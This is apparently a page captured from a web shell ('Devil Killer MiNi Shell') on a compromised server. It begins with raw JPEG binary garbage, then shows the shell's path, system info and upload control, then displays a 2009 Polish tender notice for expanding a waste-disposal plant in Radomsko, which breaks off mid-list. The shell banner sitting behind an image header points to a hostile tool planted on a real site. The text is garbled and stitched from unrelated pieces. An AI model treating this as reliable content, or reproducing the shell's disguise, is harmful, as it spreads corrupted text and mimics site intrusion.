JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090120/21477-N-2009.html

<p class="kh_header"><b>Radomsko: Rozbudowa Zakładu Unieszkodliwiania Odpadów Komunalnych dla miasta Radomska i gmin ościennych w Jadwinówce gm. Radomska - etap II</b><br>
<b>Numer ogłoszenia: 21477 - 2009; data zamieszczenia: 20.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej Spółka  z o.o. , ul. Stara Droga 85, 97-500 Radomsko, woj. łódzkie, tel. 044 6830630 w.29, faks 044 6834377.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgk-radomsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o. - 100 % udziałów jest własnością Gminy Miasta Radomsko.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa Zakładu Unieszkodliwiania Odpadów Komunalnych dla miasta Radomska i gmin ościennych w Jadwinówce gm. Radomska - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja zadania pn. : Rozbudowa Zakładu Unieszkodliwiania Odpadów Komunalnych dla miasta Radomska i gmin ościennych w Jadwinówce gm. Radomsko - etap II na bazie istniejącego Zakładu wraz z dostawą linii technologicznej sortowni i sprzętu do kompostowni.
2. Zakład Unieszkodliwiania Odpadów Komunalnych obsługiwać będzie cały teren miasta  Radomska oraz gminy ościenne a także rejon opisany w Wojewódzkim Planie Gospodarki  Odpadami Województwa Łódzkiego 2011 ( z uwzględnieniem lat 2012 - 2015 ).
3. Zadanie będzie realizowane i finansowane ze środków własnych, pozyskanych z Fundacji EkoFundusz oraz Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Warszawie. 
4. Zamawiający wymaga aby oferent wykonujący zamówienie w części finansowanej przez  EkoFundusz korzystał  z dostawców lub wykonawców ze Stanów Zjednoczonych, Szwajcarii, Norwegii i/lub krajów Unii Europejskiej.     
5. Realizacja przedmiotu zamówienia będzie przebiegała z podziałem na 3 części. Oferty należy składać w odniesieniu do wszystkich części zamówienia. 
6. Zakres rzeczowy przedmiotu zamówienia obejmuje wykonanie:

1.  W I części realizacji zamówienia:
a) Budowę hali sortowni odpadów ( wymiary w osiach 24,62 x 84,72 m )
HALA  SORTOWNI  ODPADÓW
1. Powierzchnia zabudowy    2 085,8 m2, 
2. Powierzchnia użytkowa      1 922 m2, 
3. Kubatura                       19 882 m3.
b) Budowę nawierzchni w obrębie ZUOK w tym: 

- place i drogi o nawierzchni betonowej, utwardzonej do kompostowania odpadów bio i odp. zielonych,  
- zbiornik na ścieki sanitarne 30m3,
- instalacje sanitarne, deszczowe, sieć hydrantowa,
- budowa stacji trafo wraz z instalacjami elektrycznymi, oświetleniem terenu oraz liniami kablowymi. 

2.  W II części realizacji zamówienia: 

a) Zakup i montaż linii sortowniczej o wydajności 35.000 Mg/rok
- bunkier załadowczy,
-  przenośniki kanałowe, 
-  przenośniki wznoszące, 
-  przenośnik sortowniczy wstępny,
-  trybuny sortownicze z kabinami sortowniczymi,
-  sito bębnowe obrotowe,  
-  przenośniki przesyłowe,  
-  separatory elektromagnetyczne,  
-  przenośniki rewersyjne,  
-  prasa ( makulatura, pet ),
-  perforator do butelek pet,    

3.  W III części realizacji zamówienia: 

a) Zakup sprzętu technologicznego do hali sortowni w tym: 

-   ładowarka przegubowa,    
-   samochód z urządzeniem hakowym,    
-   wózek widłowy,    
-   kontenery rolkowe,    
-   pojemniki na odpady niebezpieczne i metale o poj. 120 l i 1100 l,    
-   urządzenie czyszczące, 
-   urządzenie wysokociśnieniowe,  

b) Zakup sprzętu do kompostowni odpadów organicznych i zielonych w tym:

-   ciągnik,    
-   rozdrabniarka,    
-   przerzucarka,    
-   sito obrotowe,    
-   koparko-ładowarka,  

c) Zakup pojemników na odpady niebezpieczne w tym:

-   świetlówki,    
-   zużyte akumulatory,    
-   zaolejone odpady 80 l,    
-   materiały niebezpieczne płynne 600 l,  
-   materiały niebezpieczne płynne 990 l,         
-   materiały niebezpieczne stałe 600 l,           
-   materiały niebezpieczne stałe 800 l,    

d) Rozruch linii technologicznej sortowni odpadów.
e) Rozwój selektywnej zbiórki odpadów w tym:
- zakup samochodu z HDS, 
- zakup pojemników do selektywnej zbiórki typu dzwon.

4. Szczegółowy zakres rzeczowy zleconych prac i robót, warunki ich realizacji określa:                                       
  - opis urządzeń i zespołów technologicznych linii sortowniczej oraz sprzętu             technologicznego dla ZUOK w m. Jadwinówka - załącznik nr 8 do SIWZ,
  - projekt budowlany rozbudowy Zakładu Unieszkodliwiania Odpadów Komunalnych dla miasta Radomska i gmin ościennych w Jadwinówce - załączniki nr 27 do SIWZ,
5. Wykonawca zobowiązuje się do wykonania zamówienia zgodnie z w/w dokumentami a także zgodnie  z odpowiednimi Polskimi Normami, aktami prawnymi oraz zasadami wiedzy technicznej oraz ustalonych warunkach.  
Szczegółowy opis przedmiotu zamówienia stanowią:
1) Przedmiary robót - załączniki nr  18, 19, 20, 21, 22, 23, 24 do SIWZ,
2) Projekt budowlany rozbudowy Zakładu Unieszkodliwiania Odpadów Komunalnych dla miasta Radomska i  gmin ościennych w Jadwinówce - załącznik nr 27,  
3) Część rysunkowa - załącznik nr 28.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.22.21.10-3, 45.23.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 400.000,00 PLN ( słownie: czterysta tysięcy PLN 00/100 )<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.  
W tym zakresie Zamawiający wymaga, aby Wykonawcy:
   a) prowadzili zarejestrowaną działalność gospodarczą w zakresie dotyczącym przedmiotu zamówienia.
2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych  podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
    W tym zakresie Zamawiający wymaga, aby Wykonawcy:
   a) wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o  udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane polegające na budowie, przebudowie obiektów wraz z infrastrukturą towarzyszącą typu drogi, place sieci i przyłącza o  kubaturze minimum 20.000 m3 i wartości nie mniejszej niż 10,0 mln zł brutto każda oraz zrealizowali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym 
okresie co najmniej 1 dostawę o wartości nie mniejszej niż 5,0 mln zł brutto, odpowiadającą swoim rodzajem dostawom stanowiącym przedmiot zamówienia. Za dostawy odpowiadające swoim rodzajem dostawom stanowiącym przedmiot  zamówienia uznaje się dostawy równoważne z zakresem dostaw określonych w rozdziale 3 w II części  realizacji zamówienia pkt a) oraz w III części pkt a) i b) SIWZ stanowiącym przedmiot zamówienia.
  b) dysponowali osobami zdolnymi do realizacji zamówienia posiadającymi uprawnienia do sprawowania funkcji: kierownika robót, kierowników w branżach:  
    - instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych; 
    - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
    - konstrukcyjno- budowlanej w zakresie dróg; 
       Wykonawca przedstawi w ofercie kandydatów na każde stanowisko wymienione powyżej. 
Do wykazu należy załączyć dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie w funkcji kierownika robót, kierowników poszczególnych branż są uprawnione bez ograniczeń w swoich specjalnościach do kierowania robotami wraz z aktualnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa oraz oświadczeniami wskazanych osób o gotowości uczestnictwa w realizacji zamówienia wg samodzielnie napisanego załącznika.
Zamawiający wymaga, aby osoby pełniące funkcję kierownika robót, posiadały co najmniej 10-letnie doświadczenie zawodowe przy realizacji inwestycji budowlanych w tym, co najmniej 5-letnie doświadczenie zawodowe na stanowiskach kierowniczych podobnych  robót, a kierownicy poszczególnych branż co najmniej 5 letnie doświadczenie zawodowe w tym, co najmniej 3-letnie doświadczenie zawodowe na stanowiskach kierowniczych. Dodatkowo, w odniesieniu do osoby pełniącej funkcję kierownika robót budowlanych, Wykonawcy zobowiązani są do przedłożenia informacji dotyczącej jego 5-letniego doświadczenia zawodowego w pracy na stanowisku kierownika robót w zakresie organizacji i zarządzania robotami budowlanymi. Informacja ta winna zawierać:
- przedmiot zamówienia ( wykaz prowadzonych robót ),
- podmiot, dla którego realizowane było zamówienie,
- daty od ( miesiąc/rok ) do ( miesiąc/rok ) pełnienia funkcji kierownika robót budowlanych, Wymagane informacje winny jasno wskazywać doświadczenie kandydata w pełnieniu funkcji kierownika robót.
3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
    W tym zakresie Wykonawca musi spełniać następujące warunki:
a) osiągnął w każdym z ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przychody netto ze sprzedaży na poziomie nie niższym niż wartość wycenionego przedmiotu zamówienia ( wartość podana w formularzu ofertowym ).

    W celu potwierdzenia i weryfikacji przez Zamawiającego spełnienia powyższego warunku Wykonawcy zobowiązani są przedłożyć sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za ostatnie trzy lata obrotowe ( 2005-2007 ), a jeżeli okres prowadzenia działalności jest  krótszy - za ten okres,   
 b) posiada własne środki finansowe lub zdolność kredytową umożliwiającą realizację zamówienia w wysokości nie mniejszej niż 8,0 mln zł ( słownie: osiem milionów zł ). 
     Na potwierdzenie spełnienia powyższego warunku Wykonawca jest zobowiązany załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo -  kredytowej, w którym/których posiada rachunek bankowy, potwierdzającą w sposób  jednoznaczny wysokość posiadanych środków finansowych lub zdolność kredytową jeszcze nie zaangażowaną dla innych działań Wykonawcy.
4)  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
     W tym zakresie Zamawiający wymaga, aby Wykonawcy:
 a) nie zalegali z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, 
 b) nie podlegali wykluczeniu z postępowania o udzielenie zamówienia publicznego.
5) Wniosą wadium w wysokości 400.000,00 PLN ( słownie: czterysta tysięcy PLN 00/100 ) w formie określonej w rozdziale 8 pkt. 8.3 specyfikacji istotnych warunków zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków określonych w sekcji III.2) Wykonawcy zobowiązani są przedłożyć następujące dokumenty: 
1) wypełniony Formularz Ofertowy sporządzony ściśle wg wzoru druku załączonego do SIWZ - załącznik nr 1;  
2) wypełniony i podpisany Formularz Cenowy z wykorzystaniem wzoru - załączniki nr 2, 3, 4, 5, 6, 7;
3) oświadczenie o spełnieniu warunków udziału w postępowaniu opisanych w art. 22 i nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2  ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych ( Dz.U. Nr 223, poz.1655 z 2007 r. oraz Dz. U. Nr 171, poz. 1058 z 2008 r. ) - załącznik nr 9; 
4) oświadczenie, że oferowane roboty budowlane/dostawy odpowiadają wymaganiom określonym przez Zamawiającego - załącznik nr 10;  
5) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
6) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu  podatkowego,  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
7) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie 
zamówienia albo składania ofert;
8) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;  
9) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;  
10) wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane polegające na budowie, przebudowie obiektów wraz z infrastrukturą towarzyszącą typu drogi, place sieci i przyłącza o  kubaturze minimum 20.000 m3 i wartości nie mniejszej niż 10,0 mln zł brutto każda z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie ( np. referencje, protokoły odbioru ) - załącznik nr 11;
11) wykaz wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 dostawy o wartości nie mniejszej niż 5,0 mln zł brutto, odpowiadającej swoim rodzajem dostawom określonych w rozdziale 3 w II części realizacji zamówienia pkt a) oraz w III części pkt a) i b) SIWZ z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie ( np. referencje,     protokoły odbioru ) - załącznik nr 12; 
12) wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - załącznik nr 13;   
12a) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 12, Wykonawca wskazał osoby, którymi będzie dysponował.
    Wykaz należy przygotować w oparciu o wymagania Zamawiającego opisane w pkt 5.1 ppkt 2 lit. b SIWZ, z wykorzystaniem załącznika nr 13. 
13) wykaz robót, które Wykonawca zamierza zlecić podwykonawcom - załącznik nr 14;
14) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca do realizacji zamówienia ( rodzaj sprzętu, rok produkcji, ilość sztuk, stan własności - załącznik nr 15; 
14a) pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do 
    wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 14, Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował; 
15) informację na temat przeciętnej liczby zatrudnionych pracowników w liczbie co najmniej 50 pracowników ( w robotach budowlanych bez pracowników administracji i kierownictwa ) oraz liczebności personelu kierowniczego w ilości co najmniej 5 osób  w  okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie - załącznik nr 16; 
16) informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę nie mniejszą niż 8,0 mln zł ( słownie: osiem milionów zł ) - wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;  
17) polisę, a przypadku jej braku inny dokument potwierdzający, że Wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  gospodarczej na kwotę minimum 5,0 mln zł ( słownie: pięć milionów złotych ). Jeżeli polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony obejmuje okres krótszy niż termin realizacji zamówienia, Wykonawca składa oświadczenie, że w przypadku wyboru jego oferty zobowiązuje się do przedłużenia polisy na cały okres objęty zamówieniem oraz zobowiązuje się do przedkładania kolejnej polisy    Zamawiającemu w wypadku zakończenia okresu ubezpieczenia.      
18) oświadczenie Wykonawcy do wniesienia zabezpieczenia i formy należytego wykonania umowy w przypadku uzyskania zamówienia w wysokości 10% ceny całkowitej podanej w ofercie - wg samodzielnie napisanego załącznika;
19) dokument potwierdzający, że Wykonawca posiada certyfikat ISO -9001 lub inny równoważny certyfikat potwierdzający spełnienie przez firmę norm jakościowych w  zakresie robót budowlanych;
20) sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty  oraz zobowiązania i należności - za ostatnie trzy lata obrotowe ( 2005-2007 ), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;   
21) zobowiązanie Wykonawcy w przypadku uzyskania zamówienia do ubezpieczenia budowy i robót na czas trwania kontraktu, na kwotę brutto zaoferowaną w przetargu z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz  odpowiedzialności cywilnej - wg samodzielnie napisanego załącznika; 
22) oświadczenie o dokonaniu wizji terenu przeznaczonego pod realizację zadania - załącznik nr 17;
23) kosztorys ofertowy ( wg załączonych przedmiarów robót ) - załączniki  nr 18, 19, 20, 21, 22, 23, 24;
24) proponowany harmonogram rzeczowo-terminowo-finansowy w układzie miesięcznych przepływów finansowych dla całego trwania kontraktu - według samodzielnie napisanego załącznika. Zamawiający wymaga aby stopień    zaawansowania przedsięwzięcia przedstawiony w harmonogramie wynosił: 
 - na dzień 31.07.2009 r. -  60%, 
 - na dzień 15.09.2009 r. -  80%, 
 - na dzień 06.11.2009 r. -100%;
25) oświadczenie o zrealizowaniu zamówienia zgodnie z harmonogramem rzeczowo-terminowo-finansowym - załącznik nr 25;
26) zaparafowany projekt umowy - załącznik nr 26;
27) dowód wniesienia wadium.
Oferta wspólna.

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia ( w rozumieniu art. 23 ustawy Pzp ) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego oraz do załączenia do oferty dokumentu pełnomocnictwa 
( oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza ). Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty.
2) Pełnomocnika należy wskazać w formularzu ofertowym w pkt 12 SIWZ. 
3) Dokument pełnomocnictwa musi zawierać w szczególności wskazanie:
 a. postępowania o zamówienie publiczne, którego dotyczy;
 b. wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
 c. ustanowionego Pełnomocnika oraz zakres jego umocowania.
4) Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym ustanowionego Pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli, mające prawo do zaciągania zobowiązań, wyszczególnione w dokumencie rejestracyjnym prowadzonej działalności gospodarczej, w sposób przewidziany w tym dokumencie dla formy reprezentacji tego podmiotu gospodarczego.   
5) W przypadku składania oferty przez Wykonawców występujących wspólnie dokumenty, o których mowa w Sekcji III.2) - Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu pkt 3,5,6,7,8,9 muszą być złożone osobno przez każdego Wykonawcę. Pozostałe dokumenty będą traktowane jako wspólne. 
6) Oświadczenia, formularze, dokumenty sporządzone na załączonych do SIWZ wzorach, składa i podpisuje w imieniu wszystkich Wykonawców, Pełnomocnik wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających ofertę wspólną.
7) Wszystkie kserokopie dokumentów załączone do oferty muszą być opisane za zgodność z oryginałem i podpisane przez Pełnomocnika.
8) Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres wpisano w formularzu ofertowym.
9) Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający  zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.

Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
     1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Sekcji III.2) - Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:
    1)  pkt 5, 6, 7, 9 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
     a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
